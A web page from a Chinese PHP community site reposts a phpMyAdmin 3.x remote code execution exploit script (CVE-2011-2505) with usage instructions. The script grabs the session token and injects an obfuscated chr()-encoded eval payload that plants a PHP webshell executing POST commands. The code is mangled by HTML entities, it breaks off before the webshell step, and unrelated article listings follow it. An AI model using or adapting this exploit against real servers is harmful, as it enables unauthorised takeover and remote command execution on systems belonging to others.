phpMyAdmin3.X远程代码执行漏洞0day

#!/usr/bin/php

print_r&＃40;\'
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
\'&＃41;;
 
/**
 * working when the directory:"config" exists and is writeable.
**/
 
if &＃40;$argc < 3&＃41; &＃123;
    print_r&＃40;\'
+---------------------------------------------------------------------------+
Usage: php \'.$argv&＃91;0&＃93;.\' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php \'.$argv&＃91;0&＃93;.\' localhost /pma/
+---------------------------------------------------------------------------+
\'&＃41;;
    exit;
&＃125;
 
$host = $argv&＃91;1&＃93;;
$path = $argv&＃91;2&＃93;;
 
/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....n";
$returnstr=php_request&＃40;\'config/\'&＃41;;
if&＃40;strpos&＃40;$returnstr,\'404\'&＃41;&＃41;&＃123;
    exit&＃40;"[-] Exploit Failed! The directory:config do not exists!n"&＃41;;
&＃125;
 
/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....n";
$result=php_request&＃40;\'index.php\'&＃41;;
preg_match&＃40;\'/phpMyAdmin=(w{32,40});(.*?)token=(w{32})&/s\', $result, $resp&＃41;;
$token=$resp&＃91;3&＃93;;
$sessionid=$resp&＃91;1&＃93;;
if&＃40;$token && $sessionid&＃41;&＃123;
    echo "[+] token:$tokenn";
    echo "[+] Session ID:$sessionidn";
&＃125;else&＃123;
    exit&＃40;"[-] Can\'t get token and Session ID,Exploit Failed!n"&＃41;;
&＃125;
 
/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....n";
php_request&＃40;\'db_create.php?token=\'.$token.\'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net\',\'\',\'phpMyAdmin=\'.$sessionid&＃41;;//Actually,almost all the php files in home directory of pma3 can be used here.
 
/**
 * Try to create webshell
                
                       

        
        
    


    

        

                        
php
                    
    



    

        
写下你的评论吧 !
        

            

                吐个槽吧,看都看了
            
            

                

                                        会员登录 | 用户注册
                                    
                

            
        

        
    

    

        
推荐阅读
        

            

                                

                    

                        php
                        
Matplotlib，带有已保存图形的注释已被切断
                    

                    

                                                

                        Matplotlib，带有已保 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 20:14:33
                    

                

                
                                

                    

                        php
                        
2018年人工智能大数据的爆发，学Java还是Python？
                    

                    

                                                

                            
                        
                                                

                        本文介绍了2018年人工智能大数据的爆发以及学习Java和Python的相关知识。在人工智能和大数据时代，Java和Python这两门编程语言都很优秀且火爆。选择学习哪门语言要根据个人兴趣爱好来决定。Python是一门拥有简洁语法的高级编程语言，容易上手。其特色之一是强制使用空白符作为语句缩进，使得新手可以快速上手。目前，Python在人工智能领域有着广泛的应用。如果对Java、Python或大数据感兴趣，欢迎加入qq群458345782。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 20:08:28
                    

                

                                

                    

                    
                
                
                                

                    

                        int
                        
GetWindowLong函数
                    

                    

                                                

                            
                        
                                                

                        今天在看一个代码里头写了GetWindowLong(hwnd,0)，我当时就有点费解，靠，上网搜索函数原型说明，死活找不到第 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 17:58:15
                    

                

                
                                

                    

                        int
                        
Python3中选择文件对话框的格式打开和保存图片
                    

                    

                                                

                        本文介绍了在Python3中如何使用选择文件对话框的格式打开和保存图片的方法。通过使用tkinter库中的filedialog模块的asksaveasfilename和askopenfilename函数，可以方便地选择要打开或保存的图片文件，并进行相关操作。具体的代码示例和操作步骤也被提供。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 17:46:55
                    

                

                
                                

                    

                        int
                        
第一次参加比赛的经历和感受
                    

                    

                                                

                        本文描述了作者第一次参加比赛的经历和感受。作者是小学六年级时参加比赛的唯一选手，感到有些紧张。在比赛期间，作者与学长学姐一起用餐，在比赛题目中遇到了一些困难，但最终成功解决。作者还尝试了一款游戏，在回程的路上感到晕车。最终，作者以110分的成绩取得了省一会的资格，并坚定了继续学习的决心。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 17:42:14
                    

                

                
                                

                    

                        timestamp
                        
Android 新闻App的本地服务器搭建教程
                    

                    

                                                

                        本文介绍了在开发Android新闻App时，搭建本地服务器的步骤。通过使用XAMPP软件，可以一键式搭建起开发环境，包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表，并设置相应的属性。最后，给出了创建new表的SQL语句。这个教程适合初学者参考。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 17:15:19
                    

                

                
                                

                    

                        blob
                        
基于layUI的图片上传前预览功能的2种实现方式
                    

                    

                                                

                            
                        
                                                

                        本文介绍了基于layUI的图片上传前预览功能的两种实现方式：一种是使用blob+FileReader，另一种是使用layUI自带的参数。通过选择文件后点击文件名，在页面中间弹窗内预览图片。其中，layUI自带的参数实现了图片预览功能。该功能依赖于layUI的上传模块，并使用了blob和FileReader来读取本地文件并获取图像的base64编码。点击文件名时会执行See()函数。摘要长度为169字。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 17:06:58
                    

                

                
                                

                    

                        blob
                        
搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的详细步骤
                    

                    

                                                

                            
                        
                                                

                        本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的步骤，包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 17:03:58
                    

                

                
                                

                    

                        int
                        
PHP图片截取方法及应用实例
                    

                    

                                                

                            
                        
                                                

                        本文介绍了使用PHP动态切割JPEG图片的方法，并提供了应用实例，包括截取视频图、提取文章内容中的图片地址、裁切图片等问题。详细介绍了相关的PHP函数和参数的使用，以及图片切割的具体步骤。同时，还提供了一些注意事项和优化建议。通过本文的学习，读者可以掌握PHP图片截取的技巧，实现自己的需求。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 16:44:09
                    

                

                
                                

                    

                        int
                        
关羽败走麦城时路过马超封地 马超为何没有出手救人
                    

                    

                                                

                            
                        
                                                

                        对当年关羽败走麦城，恰好路过马超的封地，为啥马超不救他?很感兴趣的小伙伴们，趣历史小编带来详细的文章供大家参考。说到英雄好汉，便要提到一本名著了，没错，那就是《三国演义》。书中虽 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 16:29:09
                    

                

                
                                

                    

                        int
                        
C#学习教程：在Console中工作但在Windows窗体中不工作的异步代码分享
                    

                    

                                                

                        本文分享了一个关于在C#中使用异步代码的问题，作者在控制台中运行时代码正常工作，但在Windows窗体中却无法正常工作。作者尝试搜索局域网上的主机，但在窗体中计数器没有减少。文章提供了相关的代码和解决思路。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 15:56:00
                    

                

                
                                

                    

                        main
                        
Java实现大数乘法（分治算法）
                    

                    

                                                

                        本文介绍了使用Java实现大数乘法的分治算法，包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 15:43:50
                    

                

                
                                

                    

                        main
                        
PHP设置MySQL字符集的方法及使用mysqli_set_charset函数
                    

                    

                                                

                            
                        
                                                

                        本文介绍了PHP设置MySQL字符集的方法，详细介绍了使用mysqli_set_charset函数来规定与数据库服务器进行数据传送时要使用的字符集。通过示例代码演示了如何设置默认客户端字符集。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 15:30:33
                    

                

                
                                

                    

                        int
                        
Java序列化对象传给PHP的方法及原理解析
                    

                    

                                                

                            
                        
                                                

                        本文介绍了Java序列化对象传给PHP的方法及原理，包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用，以及代码执行序列化所需要的权限。最后指出，序列化会将对象实例的所有字段都进行序列化，使得数据能够被表示为实例的序列化数据，但只有能够解释该格式的代码才能够确定数据的内容。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 15:25:15
                    

                

                
                                

                    

                        int
                        
橱窗设计的表现手法及其应用
                    

                    

                                                

                            
                        
                                                

                        本文介绍了橱窗设计的表现手法，包括直接展示、寓意与联想、夸张与幽默等。通过对商品的折、拉、叠、挂、堆等陈列技巧，橱窗设计能够充分展现商品的形态、质地、色彩、样式等特性。同时，寓意与联想可以通过象形形式或抽象几何道具来唤起消费者的联想与共鸣，创造出强烈的时代气息和视觉空间。合理的夸张和贴切的幽默能够明显夸大商品的美的因素，给人以新颖奇特的心理感受，引起人们的笑声和思考。通过这些表现手法，橱窗设计能够有效地传达商品的个性内涵，吸引消费者的注意力。 ...
                        [详细]
                    
                    


                    

                        蜡笔小新   2023-12-14 15:14:03
                    

                

                
                
                                

                    
                    
                    
                
                

            
        
    



















    


    

        

            
            

                
                
            

            

                康博洋2602899791            

            

                这个家伙很懒，什么也没留下！            


        
    

    

    

    
    

    

        
Tags | 热门标签
        

            

                                

                    uml
                
                                

                    export
                
                                

                    const
                
                                

                    scala
                
                                

                    blob
                
                                

                    lua
                
                                

                    subset
                
                                

                    bitmap
                
                                

                    int
                
                                

                    python2
                
                                

                    bit
                
                                

                    schema
                
                                

                    integer
                
                                

                    javascript
                
                                

                    dagger
                
                                

                    spring
                
                                

                    fetch
                
                                

                    plugins
                
                                

                    eval
                
                                

                    audio
                
                                

                    metadata
                
                                

                    iostream
                
                                

                    heatmap
                
                                

                    bash
                
                                

                    timestamp
                
                                

                    solr
                
                                

                    dll
                
                                

                    buffer
                
                                

                    loops
                
                                

                    main
                
                                

            
        
    

    
    

        

            

            

        
        
RankList | 热门文章
        

            

                                

                    1由包含WebBrowser控件的WPF视图引起的内存泄漏
                
                                

                    2爱剪辑如何导出60帧视频？爱剪辑导出60帧视频的方法
                
                                

                    3什么是项目？影响项目目标实现的因素有哪些？
                
                                

                    4phpajax无刷新更新的简单介绍
                
                                

                    5vivov3怎么设置来电显示？
                
                                

                    6add remove server找不到_python经典面试题：想找工作？这些面试题你会了吗？
                
                                

                    7安卓编年史（1）：Android
                
                                

                    8elementui elinput textarea 可自适应文本高度的文本域分析
                
                                

                    9python插件式开发中使用reload_python中reload(module)的用法示例详解
                
                                

                    10argparse.ArgumentParser()的用法
                
                                

                    112122数据结构实验之链表七：单链表中重复元素的删除
                
                                

                    12如何防止或关闭位图的direct2d“自动缩放”？ - How to prevent or turn off direct2d “autoscaling” of a bitmap?
                
                                

                    13PM2.5检测 -- PMS7003 串口测试
                
                                

                    14信息安全_金融信息安全实训之加密
                
                                

                    15rman备份概述
                
                            
        
    
    
    




    PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具  | 在线工具

    Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved  |   京公网安备 11010802041100号  |  京ICP备19059560号-4 | PHP1.CN 第一PHP社区      版权所有